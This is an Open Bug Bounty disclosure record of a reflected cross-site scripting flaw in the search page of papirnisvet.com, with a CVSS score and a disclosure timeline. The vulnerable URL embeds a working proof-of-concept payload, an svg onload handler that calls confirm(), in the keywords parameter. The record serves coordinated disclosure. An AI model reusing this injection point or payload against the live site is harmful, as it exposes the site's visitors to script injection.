papirnisvet.com XSS vulnerability

2017-11-30T10:22:00
ID OBB:444368
Type openbugbounty
Reporter Rashed_Naamani
Modified 2018-02-28T10:22:00

Description

Open Bug Bounty ID: OBB-444368

Description| Value
---|---
Affected Website:| papirnisvet.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.papirnisvet.com/search.php?data[page]=5&action;=search&data;[category_id]=&data;[manuf_id]=&data;[keywords]=%27%22%3E%3Csvg%2Fonload%3Dconfirm(%2FOPENBUGBOUNTY%2F)%3E&submit;[search]=+Tra%C5%BEi+&data;[order]=&data;[product][1209]=&data;[product][5302]=&data;[product][1224]=&data;[product][5301]=&data;[product][4427]=&data;[product][4255]=&data;[product][1271]=&data;[product][1272]=&data;[product][1273]=&data;[product][1274]=&data;[product][1275]=&data;[product][1276]=&data;[product][1278]=&data;[product][1279]=&data;[product][1280]=&data;[product][1281]=&data;[product][1303]=&data;[product][1304]=&data;[product][5300]=&data;[product][5299]=&data;[product][1330]=&data;[product][3602]=&data;[product][5298]=&data;[product][5297]=&data;[product][5713]=&data;[product][5666]=&data;[product][3879]=&data;[product][1371]=&data;[product][3878]=&data;[product][3528]=&data;[product][1377]=&data;[product][1383]=&data;[product][1384]=&data;[product][1385]=&data;[product][1386]=&data;[product][1387]=&data;[product][1388]=&data;[product][1389]=&data;[product][1390]=&data;[product][1391]=&data;[product][4203]=&data;[product][1395]=&data;[product][1396]=&data;[product][1397]=&data;[product][1402]=&data;[product][1403]=&data;[product][1406]=&data;[product][1407]=&data;[product][1409]=&data;[product][1410]=&data;[product][1414]=&data;[product][1415]=&data;[product][3552]=&data;[product][3544]=&data;[product][1440]=&data;[product][1441]=&data;[product][5296]=&data;[product][1447]=&data;[product][1448]=&data;[product][1454]=&data;[product][1456]=&data;[product][1457]=&data;[product][1460]=&data;[product][1461]=&data;[product][5283]=&data;[product][5284]=&data;[product][3680]=&data;[product][4220]=&data;[product][3873]=&data;[product][4687]=&data;[product][1498]=&data;[product][1499]=&data;[product][1500]=&data;[product][3679]=&data;[product][1512]=&data;[product][1513]=&data;[product][1520]=&data;[product][1521]=&data;[product][1522]=&data;[product][5355]=&data;[product][5347]=&data;[product][1529]=&data;[product][1531]=&data;[product][1536]=&data;[product][1537]=&data;[product][1542]=&data;[product][1543]=&data;[product][1544]=&data;[product][1546]=&data;[product][5704]=&data;[product][5295]=&data;[product][3147]=
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 30 November, 2017 10:22 GMT
Vulnerability Verified:| 30 November, 2017 10:24 GMT
Website Operator Notified:| 30 November, 2017 10:24 GMT
Vulnerability Published:| 30 November, 2017 10:24 GMT[without any technical details]
Public Disclosure:| 28 February, 2018 10:22 GMT